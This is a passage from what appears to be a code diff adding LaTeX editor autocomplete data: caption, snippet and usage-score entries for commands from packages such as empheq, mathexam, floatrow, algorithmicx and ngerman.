}, + { + caption: '\\longleftarrow', + snippet: '\\longleftarrow', + meta: 'empheq-cmd', + score: 0.0011096532692473691, + }, + { + caption: '\\dbinom{}{}', + snippet: '\\dbinom{$1}{$2}', + meta: 'empheq-cmd', + score: 0.006800272303210672, + }, + { + caption: '\\Tilde{}', + snippet: '\\Tilde{$1}', + meta: 'empheq-cmd', + score: 7.874446783586035e-5, + }, + { + caption: '\\bigcup', + snippet: '\\bigcup', + meta: 'empheq-cmd', + score: 0.0058847868741168765, + }, + { + caption: '\\xleftrightarrow[][]{}', + snippet: '\\xleftrightarrow[$1][$2]{$3}', + meta: 'empheq-cmd', + score: 4.015559489911509e-5, + }, + { + caption: '\\vcentcolon', + snippet: '\\vcentcolon', + meta: 'empheq-cmd', + score: 0.00021361943526711615, + }, + { + caption: '\\intertext{}', + snippet: '\\intertext{$1}', + meta: 'empheq-cmd', + score: 0.0016148076375871775, + }, + { + caption: '\\coloneqq', + snippet: '\\coloneqq', + meta: 'empheq-cmd', + score: 0.0014407293323958122, + }, + { + caption: '\\mathclap{}', + snippet: '\\mathclap{$1}', + meta: 'empheq-cmd', + score: 7.84378567451772e-5, + }, + { + caption: '\\adjustlimits', + snippet: '\\adjustlimits', + meta: 'empheq-cmd', + score: 0.0005307066890271085, + }, + { + caption: '\\MoveEqLeft', + snippet: '\\MoveEqLeft', + meta: 'empheq-cmd', + score: 5.343949980628182e-5, + }, + { + caption: '\\mathrlap{}', + snippet: '\\mathrlap{$1}', + meta: 'empheq-cmd', + score: 0.0003112817211637952, + }, + { + caption: '\\nonumber', + snippet: '\\nonumber', + meta: 'empheq-cmd', + score: 0.051980653969641216, + }, + { + caption: '\\xhookrightarrow{}', + snippet: '\\xhookrightarrow{$1}', + meta: 'empheq-cmd', + score: 5.444260823474129e-5, + }, + { + caption: '\\DeclarePairedDelimiter{}{}{}', + snippet: '\\DeclarePairedDelimiter{$1}{$2}{$3}', + meta: 'empheq-cmd', + score: 0.0033916678416372487, + }, + { + caption: '\\DeclarePairedDelimiter', + snippet: '\\DeclarePairedDelimiter', + meta: 'empheq-cmd', + score: 0.0033916678416372487, + }, + { + caption: '\\prescript{}{}{}', + snippet: '\\prescript{$1}{$2}{$3}', + meta: 'empheq-cmd', + score: 8.833369785705982e-6, + }, + { + caption: '\\underbrace{}', + snippet: '\\underbrace{$1}', + meta: 'empheq-cmd', + score: 0.010373780436850907, + }, + { + caption: '\\mathllap{}', + snippet: '\\mathllap{$1}', + meta: 'empheq-cmd', + score: 3.140504277052775e-5, + }, + { + caption: '\\overbrace{}', + snippet: '\\overbrace{$1}', + meta: 'empheq-cmd', + score: 0.0006045704778718376, + }, + { + caption: '\\sinh', + snippet: '\\sinh', + meta: 'empheq-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\sinh{}', + snippet: '\\sinh{$1}', + meta: 'empheq-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\operatorname{}', + snippet: '\\operatorname{$1}', + meta: 'empheq-cmd', + score: 0.02181954887028883, + }, + { + caption: '\\max', + snippet: '\\max', + meta: 'empheq-cmd', + score: 0.04116833357968482, + }, + { + caption: '\\liminf', + snippet: '\\liminf', + meta: 'empheq-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\liminf{}', + snippet: '\\liminf{$1}', + meta: 'empheq-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\operatornamewithlimits{}', + snippet: '\\operatornamewithlimits{$1}', + meta: 'empheq-cmd', + score: 0.0022415507993352067, + }, + { + caption: '\\exp', + snippet: '\\exp', + meta: 'empheq-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\exp{}', + snippet: '\\exp{$1}', + meta: 'empheq-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\lim', + snippet: '\\lim', + meta: 'empheq-cmd', + score: 0.05285123457928509, + }, + { + caption: '\\sin', + snippet: '\\sin', + meta: 'empheq-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\sin{}', + snippet: '\\sin{$1}', + meta: 'empheq-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\arg', + snippet: '\\arg', + meta: 'empheq-cmd', + score: 0.007190995792600074, + }, + { + caption: '\\cos', + snippet: '\\cos', + meta: 'empheq-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\cos{}', + snippet: '\\cos{$1}', + meta: 'empheq-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\varliminf', + snippet: '\\varliminf', + meta: 'empheq-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\hom', + snippet: '\\hom', + meta: 'empheq-cmd', + score: 8.180643329881783e-5, + }, + { + caption: '\\tan', + snippet: '\\tan', + meta: 'empheq-cmd', + score: 0.006176447465423192, + }, + { + caption: '\\det', + snippet: '\\det', + meta: 'empheq-cmd', + score: 0.005640718203101287, + }, + { + caption: '\\ln', + snippet: '\\ln', + meta: 'empheq-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\ln{}', + snippet: '\\ln{$1}', + meta: 'empheq-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\cosh', + snippet: '\\cosh', + meta: 'empheq-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\cosh{}', + snippet: '\\cosh{$1}', + meta: 'empheq-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\gcd', + snippet: '\\gcd', + meta: 'empheq-cmd', + score: 0.002254008371792865, + }, + { + caption: '\\limsup', + snippet: '\\limsup', + meta: 'empheq-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\limsup{}', + snippet: '\\limsup{$1}', + meta: 'empheq-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\inf', + snippet: '\\inf', + meta: 'empheq-cmd', + score: 0.00340470256994063, + }, + { + caption: '\\arccos', + snippet: '\\arccos', + meta: 'empheq-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\arccos{}', + snippet: '\\arccos{$1}', + meta: 'empheq-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\ker', + snippet: '\\ker', + meta: 'empheq-cmd', + score: 0.002475379242338094, + }, + { + caption: '\\cot', + snippet: '\\cot', + meta: 'empheq-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\cot{}', + snippet: '\\cot{$1}', + meta: 'empheq-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\coth{}', + snippet: '\\coth{$1}', + meta: 'empheq-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\coth', + snippet: '\\coth', + meta: 'empheq-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\varlimsup', + snippet: '\\varlimsup', + meta: 'empheq-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\log', + snippet: '\\log', + meta: 'empheq-cmd', + score: 0.048131780413380156, + }, + { + caption: '\\varinjlim', + snippet: '\\varinjlim', + meta: 'empheq-cmd', + score: 0.000361814283649031, + }, + { + caption: '\\deg', + snippet: '\\deg', + meta: 'empheq-cmd', + score: 0.005542465148816408, + }, + { + caption: '\\arctan', + snippet: '\\arctan', + meta: 'empheq-cmd', + score: 0.0011971697553682045, + }, + { + caption: '\\dim', + snippet: '\\dim', + meta: 'empheq-cmd', + score: 0.0038210003967178293, + }, + { + caption: '\\min', + snippet: '\\min', + meta: 'empheq-cmd', + score: 0.03051120054363316, + }, + { + caption: '\\Pr', + snippet: '\\Pr', + meta: 'empheq-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\Pr[]', + snippet: '\\Pr[$1]', + meta: 'empheq-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\tanh', + snippet: '\\tanh', + meta: 'empheq-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\tanh{}', + snippet: '\\tanh{$1}', + meta: 'empheq-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\arcsin', + snippet: '\\arcsin', + meta: 'empheq-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\arcsin{}', + snippet: '\\arcsin{$1}', + meta: 'empheq-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\DeclareMathOperator{}{}', + snippet: '\\DeclareMathOperator{$1}{$2}', + meta: 'empheq-cmd', + score: 0.029440493885398676, + }, + { + caption: '\\csc', + snippet: '\\csc', + meta: 'empheq-cmd', + score: 0.00013963711107573638, + }, + { + caption: '\\sup', + snippet: '\\sup', + meta: 'empheq-cmd', + score: 0.009355514755312534, + }, + { + caption: '\\sec', + snippet: '\\sec', + meta: 'empheq-cmd', + score: 0.0005912636157903734, + }, + { + caption: '\\varprojlim', + snippet: '\\varprojlim', + meta: 'empheq-cmd', + score: 0.0004286136584068833, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'empheq-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'empheq-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'empheq-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'empheq-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'empheq-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'empheq-cmd', + score: 0.0063276692758974925, + }, + ], + mathexam: [ + { + caption: '\\ExamInstrBox{}', + snippet: '\\ExamInstrBox{$1}', + meta: 'mathexam-cmd', + score: 0.00035308240943436196, + }, + { + caption: '\\ExamName{}', + snippet: '\\ExamName{$1}', + meta: 'mathexam-cmd', + score: 0.00165391233892938, + }, + { + caption: '\\ExamNameLine', + snippet: '\\ExamNameLine', + meta: 'mathexam-cmd', + score: 0.00165391233892938, + }, + { + caption: '\\ExamClass{}', + snippet: '\\ExamClass{$1}', + meta: 'mathexam-cmd', + score: 0.00165391233892938, + }, + { + caption: '\\ExamHead{}', + snippet: '\\ExamHead{$1}', + meta: 'mathexam-cmd', + score: 0.00165391233892938, + }, + { + caption: '\\answer{}', + snippet: '\\answer{$1}', + meta: 'mathexam-cmd', + score: 0.0034436236729672894, + }, + { + caption: '\\answer', + snippet: '\\answer', + meta: 'mathexam-cmd', + score: 0.0034436236729672894, + }, + { + caption: '\\lhead{}', + snippet: '\\lhead{$1}', + meta: 'mathexam-cmd', + score: 0.05268978171228714, + }, + { + caption: '\\chaptermark', + snippet: '\\chaptermark', + meta: 'mathexam-cmd', + score: 0.005924520024686584, + }, + { + caption: '\\chaptermark{}', + snippet: '\\chaptermark{$1}', + meta: 'mathexam-cmd', + score: 0.005924520024686584, + }, + { + caption: '\\fancypagestyle{}{}', + snippet: '\\fancypagestyle{$1}{$2}', + meta: 'mathexam-cmd', + score: 0.009430919590937878, + }, + { + caption: '\\footrule', + snippet: '\\footrule', + meta: 'mathexam-cmd', + score: 0.0010032754348913366, + }, + { + caption: '\\footrule{}', + snippet: '\\footrule{$1}', + meta: 'mathexam-cmd', + score: 0.0010032754348913366, + }, + { + caption: '\\fancyfoot[]{}', + snippet: '\\fancyfoot[$1]{$2}', + meta: 'mathexam-cmd', + score: 0.024973618823189894, + }, + { + caption: '\\fancyfoot{}', + snippet: '\\fancyfoot{$1}', + meta: 'mathexam-cmd', + score: 0.024973618823189894, + }, + { + caption: '\\fancyfootoffset[]{}', + snippet: '\\fancyfootoffset[$1]{$2}', + meta: 'mathexam-cmd', + score: 0.0015373246231684555, + }, + { + caption: '\\fancyfootoffset{}', + snippet: '\\fancyfootoffset{$1}', + meta: 'mathexam-cmd', + score: 0.0015373246231684555, + }, + { + caption: '\\footruleskip', + snippet: '\\footruleskip', + meta: 'mathexam-cmd', + score: 0.000830117957327721, + }, + { + caption: '\\fancyheadoffset[]{}', + snippet: '\\fancyheadoffset[$1]{$2}', + meta: 'mathexam-cmd', + score: 0.0016786568695309166, + }, + { + caption: '\\fancyheadoffset{}', + snippet: '\\fancyheadoffset{$1}', + meta: 'mathexam-cmd', + score: 0.0016786568695309166, + }, + { + caption: '\\iffloatpage{}{}', + snippet: '\\iffloatpage{$1}{$2}', + meta: 'mathexam-cmd', + score: 6.606286310833368e-5, + }, + { + caption: '\\cfoot{}', + snippet: '\\cfoot{$1}', + meta: 'mathexam-cmd', + score: 0.013411641301057813, + }, + { + caption: '\\subsectionmark', + snippet: '\\subsectionmark', + meta: 'mathexam-cmd', + score: 3.1153423008593836e-5, + }, + { + caption: '\\footrulewidth', + snippet: '\\footrulewidth', + meta: 'mathexam-cmd', + score: 0.011424740897486949, + }, + { + caption: '\\fancyhfoffset[]{}', + snippet: '\\fancyhfoffset[$1]{$2}', + meta: 'mathexam-cmd', + score: 3.741978601121172e-5, + }, + { + caption: '\\rhead{}', + snippet: '\\rhead{$1}', + meta: 'mathexam-cmd', + score: 0.022782817416731292, + }, + { + caption: '\\fancyplain{}{}', + snippet: '\\fancyplain{$1}{$2}', + meta: 'mathexam-cmd', + score: 0.007402339896386138, + }, + { + caption: '\\rfoot{}', + snippet: '\\rfoot{$1}', + meta: 'mathexam-cmd', + score: 0.013393817825547868, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'mathexam-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\plainheadrulewidth', + snippet: '\\plainheadrulewidth', + meta: 'mathexam-cmd', + score: 6.2350576842596716e-6, + }, + { + caption: '\\baselinestretch', + snippet: '\\baselinestretch', + meta: 'mathexam-cmd', + score: 0.03225350148161425, + }, + { + caption: '\\lfoot{}', + snippet: '\\lfoot{$1}', + meta: 'mathexam-cmd', + score: 0.00789399846642229, + }, + { + caption: '\\MakeUppercase{}', + snippet: '\\MakeUppercase{$1}', + meta: 'mathexam-cmd', + score: 0.006776001543888959, + }, + { + caption: '\\MakeUppercase', + snippet: '\\MakeUppercase', + meta: 'mathexam-cmd', + score: 0.006776001543888959, + }, + { + caption: '\\fancyhf{}', + snippet: '\\fancyhf{$1}', + meta: 'mathexam-cmd', + score: 0.02314618933449356, + }, + { + caption: '\\sectionmark', + snippet: '\\sectionmark', + meta: 'mathexam-cmd', + score: 0.005008938879210868, + }, + { + caption: '\\fancyhead[]{}', + snippet: '\\fancyhead[$1]{$2}', + meta: 'mathexam-cmd', + score: 0.039101068064744296, + }, + { + caption: '\\fancyhead{}', + snippet: '\\fancyhead{$1}', + meta: 'mathexam-cmd', + score: 0.039101068064744296, + }, + { + caption: '\\nouppercase{}', + snippet: '\\nouppercase{$1}', + meta: 'mathexam-cmd', + score: 0.006416387071584083, + }, + { + caption: '\\nouppercase', + snippet: '\\nouppercase', + meta: 'mathexam-cmd', + score: 0.006416387071584083, + }, + { + caption: '\\headrule', + snippet: '\\headrule', + meta: 'mathexam-cmd', + score: 0.0008327432627715623, + }, + { + caption: '\\headrule{}', + snippet: '\\headrule{$1}', + meta: 'mathexam-cmd', + score: 0.0008327432627715623, + }, + { + caption: '\\chead{}', + snippet: '\\chead{$1}', + meta: 'mathexam-cmd', + score: 0.00755042164734884, + }, + { + caption: '\\headrulewidth', + snippet: '\\headrulewidth', + meta: 'mathexam-cmd', + score: 0.02268137935335823, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'mathexam-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'mathexam-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'mathexam-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'mathexam-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'mathexam-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'mathexam-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'mathexam-cmd', + score: 0.001042697111754002, + }, + ], + floatrow: [ + { + caption: '\\floatfoot{}', + snippet: '\\floatfoot{$1}', + meta: 'floatrow-cmd', + score: 0.0015365464531749851, + }, + { + caption: '\\restylefloat{}', + snippet: '\\restylefloat{$1}', + meta: 'floatrow-cmd', + score: 0.0008866338267686714, + }, + { + caption: '\\floatsetup[]{}', + snippet: '\\floatsetup[$1]{$2}', + meta: 'floatrow-cmd', + score: 0.0005456136119914056, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'floatrow-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\DeclareCaptionJustification{}{}', + snippet: '\\DeclareCaptionJustification{$1}{$2}', + meta: 'floatrow-cmd', + score: 0.0001872850414971473, + }, + { + caption: '\\DeclareCaptionLabelSeparator{}{}', + snippet: '\\DeclareCaptionLabelSeparator{$1}{$2}', + meta: 'floatrow-cmd', + score: 0.0003890810058478364, + }, + { + caption: '\\DeclareCaptionFormat{}{}', + snippet: '\\DeclareCaptionFormat{$1}{$2}', + meta: 'floatrow-cmd', + score: 0.0004717618449370015, + }, + { + caption: '\\DeclareCaptionFont{}{}', + snippet: '\\DeclareCaptionFont{$1}{$2}', + meta: 'floatrow-cmd', + score: 5.0133404990680195e-5, + }, + { + caption: '\\DeclareCaptionSubType[]{}', + snippet: '\\DeclareCaptionSubType[$1]{$2}', + meta: 'floatrow-cmd', + score: 0.0001872850414971473, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'floatrow-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'floatrow-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\captionsetup{}', + snippet: '\\captionsetup{$1}', + meta: 'floatrow-cmd', + score: 0.02900783226643065, + }, + { + caption: '\\captionsetup[]{}', + snippet: '\\captionsetup[$1]{$2}', + meta: 'floatrow-cmd', + score: 0.02900783226643065, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'floatrow-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\DeclareCaptionType{}[][]', + snippet: '\\DeclareCaptionType{$1}[$2][$3]', + meta: 'floatrow-cmd', + score: 0.00015256647321237863, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'floatrow-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\footnote{}', + snippet: '\\footnote{$1}', + meta: 'floatrow-cmd', + score: 0.2253056071787701, + }, + { + caption: '\\footnotemark[]', + snippet: '\\footnotemark[$1]', + meta: 'floatrow-cmd', + score: 0.021473212893597875, + }, + { + caption: '\\footnotemark', + snippet: '\\footnotemark', + meta: 'floatrow-cmd', + score: 0.021473212893597875, + }, + ], + scrpage2: [ + { + caption: '\\automark[]{}', + snippet: '\\automark[$1]{$2}', + meta: 'scrpage2-cmd', + score: 0.0006703031783997437, + }, + { + caption: '\\automark{}', + snippet: '\\automark{$1}', + meta: 'scrpage2-cmd', + score: 0.0006703031783997437, + }, + { + caption: '\\ofoot{}', + snippet: '\\ofoot{$1}', + meta: 'scrpage2-cmd', + score: 0.000605620621498142, + }, + { + caption: '\\ofoot[]{}', + snippet: '\\ofoot[$1]{$2}', + meta: 'scrpage2-cmd', + score: 0.000605620621498142, + }, + { + caption: '\\ohead{}', + snippet: '\\ohead{$1}', + meta: 'scrpage2-cmd', + score: 0.004845161937670253, + }, + { + caption: '\\ohead[]{}', + snippet: '\\ohead[$1]{$2}', + meta: 'scrpage2-cmd', + score: 0.004845161937670253, + }, + { + caption: '\\headfont', + snippet: '\\headfont', + meta: 'scrpage2-cmd', + score: 0.0011116915941419892, + }, + { + caption: '\\setheadsepline{}', + snippet: '\\setheadsepline{$1}', + meta: 'scrpage2-cmd', + score: 0.00023538827295624133, + }, + { + caption: '\\clearscrheadings', + snippet: '\\clearscrheadings', + meta: 'scrpage2-cmd', + score: 0.0003679125016983611, + }, + { + caption: '\\clearscrheadfoot', + snippet: '\\clearscrheadfoot', + meta: 'scrpage2-cmd', + score: 0.000558377093879783, + }, + { + caption: '\\pagemark', + snippet: '\\pagemark', + meta: 'scrpage2-cmd', + score: 0.0017520841736604843, + }, + { + caption: '\\chead{}', + snippet: '\\chead{$1}', + meta: 'scrpage2-cmd', + score: 0.00755042164734884, + }, + { + caption: '\\clearscrplain', + snippet: '\\clearscrplain', + meta: 'scrpage2-cmd', + score: 0.00013252422874211978, + }, + { + caption: '\\ifoot{}', + snippet: '\\ifoot{$1}', + meta: 'scrpage2-cmd', + score: 0.0003620142864171218, + }, + { + caption: '\\ifoot[]{}', + snippet: '\\ifoot[$1]{$2}', + meta: 'scrpage2-cmd', + score: 0.0003620142864171218, + }, + { + caption: '\\ihead{}', + snippet: '\\ihead{$1}', + meta: 'scrpage2-cmd', + score: 0.0004507603139230655, + }, + { + caption: '\\ihead[]{}', + snippet: '\\ihead[$1]{$2}', + meta: 'scrpage2-cmd', + score: 0.0004507603139230655, + }, + { + caption: '\\cfoot{}', + snippet: '\\cfoot{$1}', + meta: 'scrpage2-cmd', + score: 0.013411641301057813, + }, + ], + pbox: [ + { + caption: '\\pbox{}{}', + snippet: '\\pbox{$1}{$2}', + meta: 'pbox-cmd', + score: 0.0010883030320478486, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'pbox-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'pbox-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'pbox-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'pbox-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'pbox-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'pbox-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'pbox-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'pbox-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'pbox-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pbox-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pbox-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'pbox-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'pbox-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'pbox-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'pbox-cmd', + score: 0.028955796305270766, + }, + ], + esint: [ + { + caption: '\\int', + snippet: '\\int', + meta: 'esint-cmd', + score: 0.11946660537765894, + }, + { + caption: '\\iint', + snippet: '\\iint', + meta: 'esint-cmd', + score: 0.003916494384710151, + }, + { + caption: '\\varoiint', + snippet: '\\varoiint', + meta: 'esint-cmd', + score: 0.0001069175284516453, + }, + { + caption: '\\iiint', + snippet: '\\iiint', + meta: 'esint-cmd', + score: 0.0010383179918633135, + }, + { + caption: '\\oint', + snippet: '\\oint', + meta: 'esint-cmd', + score: 0.0028650540724050534, + }, + { + caption: '\\oiint', + snippet: '\\oiint', + meta: 'esint-cmd', + score: 7.127835230109687e-5, + }, + ], + algorithmicx: [ + { + caption: '\\algrenewcommand', + snippet: '\\algrenewcommand', + meta: 'algorithmicx-cmd', + score: 0.0019861803661869416, + }, + { + caption: '\\Statex', + snippet: '\\Statex', + meta: 'algorithmicx-cmd', + score: 0.008622777195102994, + }, + { + caption: '\\BState{}', + snippet: '\\BState{$1}', + meta: 'algorithmicx-cmd', + score: 0.0008685861525307122, + }, + { + caption: '\\BState', + snippet: '\\BState', + meta: 'algorithmicx-cmd', + score: 0.0008685861525307122, + }, + { + caption: '\\algloopdefx{}[][]{}', + snippet: '\\algloopdefx{$1}[$2][$3]{$4}', + meta: 'algorithmicx-cmd', + score: 0.00025315185701145097, + }, + { + caption: '\\algnewcommand', + snippet: '\\algnewcommand', + meta: 'algorithmicx-cmd', + score: 0.0030209395012065327, + }, + { + caption: '\\algnewcommand{}[]{}', + snippet: '\\algnewcommand{$1}[$2]{$3}', + meta: 'algorithmicx-cmd', + score: 0.0030209395012065327, + }, + { + caption: '\\Comment{}', + snippet: '\\Comment{$1}', + meta: 'algorithmicx-cmd', + score: 0.005178604573219454, + }, + { + caption: '\\algblockdefx{}{}[]', + snippet: '\\algblockdefx{$1}{$2}[$3]', + meta: 'algorithmicx-cmd', + score: 0.00025315185701145097, + }, + { + caption: '\\algrenewtext{}{}', + snippet: '\\algrenewtext{$1}{$2}', + meta: 'algorithmicx-cmd', + score: 0.0024415580558825975, + }, + { + caption: '\\algrenewtext{}[]{}', + snippet: '\\algrenewtext{$1}[$2]{$3}', + meta: 'algorithmicx-cmd', + score: 0.0024415580558825975, + }, + { + caption: '\\algblock{}{}', + snippet: '\\algblock{$1}{$2}', + meta: 'algorithmicx-cmd', + score: 0.0007916858220314837, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'algorithmicx-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\algdef{}[]{}{}{}{}', + snippet: '\\algdef{$1}[$2]{$3}{$4}{$5}{$6}', + meta: 'algorithmicx-cmd', + score: 0.0003102486920966127, + }, + { + caption: '\\algdef{}[]{}{}[]{}{}', + snippet: '\\algdef{$1}[$2]{$3}{$4}[$5]{$6}{$7}', + meta: 'algorithmicx-cmd', + score: 0.0003102486920966127, + }, + { + caption: '\\algdef{}[]{}[]{}', + snippet: '\\algdef{$1}[$2]{$3}[$4]{$5}', + meta: 'algorithmicx-cmd', + score: 0.0003102486920966127, + }, + { + caption: '\\algtext{}', + snippet: '\\algtext{$1}', + meta: 'algorithmicx-cmd', + score: 0.0005463612015579842, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'algorithmicx-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'algorithmicx-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'algorithmicx-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'algorithmicx-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'algorithmicx-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'algorithmicx-cmd', + score: 0.0018957469739775527, + }, + ], + bibentry: [ + { + caption: '\\bibentry{}', + snippet: '\\bibentry{$1}', + meta: 'bibentry-cmd', + score: 0.002786693424998083, + }, + { + caption: '\\url{}', + snippet: '\\url{$1}', + meta: 'bibentry-cmd', + score: 0.13586474005868793, + }, + { + caption: '\\item', + snippet: '\\item ', + meta: 'bibentry-cmd', + score: 3.800886892251021, + }, + { + caption: '\\item[]', + snippet: '\\item[$1] ', + meta: 'bibentry-cmd', + score: 3.800886892251021, + }, + { + caption: '\\nobibliography', + snippet: '\\nobibliography', + meta: 'bibentry-cmd', + score: 0.0009870472135074372, + }, + { + caption: '\\bibliography{}', + snippet: '\\bibliography{$1}', + meta: 'bibentry-cmd', + score: 0.2659628337907604, + }, + { + caption: '\\doi{}', + snippet: '\\doi{$1}', + meta: 'bibentry-cmd', + score: 0.004001210811454663, + }, + { + caption: '\\doi', + snippet: '\\doi', + meta: 'bibentry-cmd', + score: 0.004001210811454663, + }, + ], + txfonts: [ + { + caption: '\\sqrt{}', + snippet: '\\sqrt{$1}', + meta: 'txfonts-cmd', + score: 0.20240160977404634, + }, + ], + ngerman: [ + { + caption: '\\figurename', + snippet: '\\figurename', + meta: 'ngerman-cmd', + score: 0.008169568707145965, + }, + { + caption: '\\figurename{}', + snippet: '\\figurename{$1}', + meta: 'ngerman-cmd', + score: 0.008169568707145965, + }, + { + caption: '\\indexname', + snippet: '\\indexname', + meta: 'ngerman-cmd', + score: 0.0007544109314450072, + }, + { + caption: '\\glqq', + snippet: '\\glqq', + meta: 'ngerman-cmd', + score: 0.0039133256714254504, + }, + { + caption: '\\glqq{}', + snippet: '\\glqq{$1}', + meta: 'ngerman-cmd', + score: 0.0039133256714254504, + }, + { + caption: '\\today', + snippet: '\\today', + meta: 'ngerman-cmd', + score: 0.10733849317324783, + }, + { + caption: '\\bibname', + snippet: '\\bibname', + meta: 'ngerman-cmd', + score: 0.007599529252128519, + }, + { + caption: '\\bibname{}', + snippet: '\\bibname{$1}', + meta: 'ngerman-cmd', + score: 0.007599529252128519, + }, + { + caption: '\\captionsngerman{}', + snippet: '\\captionsngerman{$1}', + meta: 'ngerman-cmd', + score: 0.00010171098214158578, + }, + { + caption: '\\grqq', + snippet: '\\grqq', + meta: 'ngerman-cmd', + score: 0.006659522189248266, + }, + { + caption: '\\grqq{}', + snippet: '\\grqq{$1}', + meta: 'ngerman-cmd', + score: 0.006659522189248266, + }, + { + caption: '\\tablename', + snippet: '\\tablename', + meta: 'ngerman-cmd', + score: 0.0029238994233674776, + }, + ], + eucal: [ + { + caption: '\\mathscr{}', + snippet: 